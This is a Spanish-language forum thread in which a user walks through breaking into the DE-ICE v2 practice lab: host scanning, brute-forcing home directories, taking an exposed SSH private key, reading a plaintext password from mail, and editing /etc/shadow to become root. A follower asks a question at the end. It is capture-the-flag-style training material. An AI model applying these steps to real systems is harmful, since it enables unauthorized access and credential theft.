[Relato] Entorno controlado de seguridad DE-Ice v2

Iniciado por cibergolen, 2 Febrero 2012, 20:49 PM

0 Miembros y 1 Visitante están viendo este tema.

cibergolen

Trasteando aburrido, descargué dos sistemas de seguridad controlados para practicar un Test de Intrusión. Estas son DE-ICE v1 y V2 respectivamente.

Las distribuciónes de seguridad pueden ser descargadas desde Heorot.net.

¿Qué necesitaremos?


-Dos máquinas virtuales
-De-ICE v2
-Backtrack 5

¿Cuáles serán nuestros objetivos?
-Webcrawling
-acceder servidor
-Obtener privilegios de ROOT

¿Reglas?
-No Exploit

Empieza la fiesta.

Lo primero que haremos será unir las dos máquinas virtuales. A de-ice se le asigna por defecto la subred 192.168.2.*.

Esto se puede realizar con el siguiente comando:
ifconfig eth0 192.168.2.150Siendo 150 una dirección libre, y eth0 su interfaz de red.

Procedamos pues a localizar el servidor.
haremos uso de Netdiscover, o en su defecto, NMAP -sP 192.168.2.*.

Veamos que tenemos por aquí.
Citar
Currently scanning: 192.168.19.0/16 | Screen View: Unique Hosts

2 Captured ARP Req/Rep packets, fro.m 2 hosts. Total size: 120
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
192.168.2.100 08:00:27:b1:50:12 01 060 CADMUS COMPUTER SYSTEMS
192.168.2.101 08:00:27:b1:50:12 01 060 CADMUS COMPUTER SYSTEMS
Tenemos dos sistemas. Escaneamos con NMAP para obtener resultados.
Citarnmap -sV 192.168.2.100 - nmap -sV 192.168.2.101
-Primer host:
CitarPORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.4
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
25/tcp open smtp Sendmail 8.13.7/8.13.7
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
110/tcp open pop3 Openwall popa3d
143/tcp open imap UW imapd 2004.357
443/tcp closed https
FTP vulnerable... Pero no utilizaremos exploits, ni para atacar, ni para escalar privilegios.

Vemos que el segundo únicamente tiene el puerto 80. Si accedemos a el via web, no vemos más que unos ficheros. Si accedemos a 192.168.2.100, vemos una página Web. Pincho el enlace y veo direcciones de correo. Está claro: Hay un servicio de correo, por lo que habrán dichos usuarios, "seguramente".

Buscando amigos

Seleccionamos la lista de correo, y la limpiamos de forma que simplemente quede el nombre del usuario, argegando el signo ~ (user) para tratar de brutalizar, haber si encontramos algún directorio de interés.

Ésta es mi lista:
Citar
root
admin
~root
~admin
~pickwick
~winkle
~snodgrass
~tupman
~weller
~tweller
~havisham
~magwitch
~pirrip
~nickleby
~rnickleby
~noggs
~squeers
~pinch
~tapley
~gamp
~marley
~scrooge
~cratchit
~sikes
~dawkins
~claypole
Brutalizamos con DirBuster en 192.168.2.101 y vemos que hay un usuario, pirrip. Tratemos si con un poco de suerte existe la carpeta .ssh.

http://192.168.2.101/~pirrip/.ssh

Ahí tenemos los id_rsa y id_rsa.pub, esperándonos

Lo almacenamos en /root/.ssh/ y damos permisos 777.

Intruder Here

Procedamos a conectar via SSH.
Citarssh pirrip@192.168.2.100
Tachán! estamos dentro.

You Have New Mail

Entramos y leemos el correo. Hagamos uso de mailx para leer el séptimo correo.
En el vemos:
Citarroot@bt:~# ssh pirrip@192.168.2.100
Linux 2.6.16.
pirrip@slax:~$ mailx
mailx version nail 11.25 7/29/05. Type ? for help.
"/var/mail/pirrip": 7 messages 7 new
>N 1 Abel Magwitch Sun Jan 13 23:53 20/748 Estella
N 2 Estella Havisham Sun Jan 13 23:53 20/780 welcome to the team
N 3 Abel Magwitch Sun Jan 13 23:53 20/875 havisham
N 4 Estella Havisham Mon Jan 14 00:05 20/861 next month
N 5 Abel Magwitch Mon Jan 14 00:05 20/868 vacation
N 6 Abel Magwitch Mon Jan 14 00:05 20/915 vacation
N 7 noreply@fermion.he Mon Jan 14 00:05 29/983 Fermion Account Login Reminder
? 7
Leemos el correo:
CitarFrom noreply@fermion.herot.net Mon Jan 14 00:05:15 2008
Return-Path: <noreply@fermion.herot.net>
From: noreply@fermion.herot.net
Date: Sun, 13 Jan 2008 23:54:42 +0000
To: pirrip@slax.example.net
Subject: Fermion Account Login Reminder
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Fermion Account Login Reminder

Listed below are your Fermion Account login credentials. Please let us know if you have any questions or problems.

Regards,
Fermion Support


E-Mail: pirrip@slax.example.net
Password: 0l1v3rTw1st
Tenemos una clave suculenta...

Root Me, Please!

Hagamos uso de una vieja técnica.
Editamos el fichero /etc/shadows, eliminamos el usuario ROOT y sustituimos pirrip por ROOT. De esta forma nos damos privilegios.

Citarsudo vi /etc/shadow
Ahí ingresaremos la clave que nos facilitó nuestro amigo via mail
Antes:
Citarroot:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
Después:
Citar
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
root:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
Guardamos, y tratamos de entrar como superadministrador. Recordemos la clave: 0l1v3rTw1st.

Citar
pirrip@slax:~$ su
Password: ***********
root@slax:/home/pirrip# whoami
root
root@slax:/home/pirrip#
GAME OVER!

Dedicación: 11Sep, [T]rasher, Batista, Exploit-Shell, en fin, a todo OverSec / CPH / H-Sec!

Fuente: Oversec.org (Escrito por mi)

Un saludo


pianista

Una curiosidad sobretodo porque en intrusiones y tal no estoy muy avezado, pero como modificas haciendo:

sudo vi /etc/shadow

Si no eres root y no tienes la contraseña de root?

Saludos

cibergolen

Cita de: pianista en  4 Febrero 2012, 18:54 PM
Una curiosidad sobretodo porque en intrusiones y tal no estoy muy avezado, pero como modificas haciendo:

sudo vi /etc/shadow

Si no eres root y no tienes la contraseña de root?

Saludos

Pirrip pertenece a wheel

Saludos!

pianista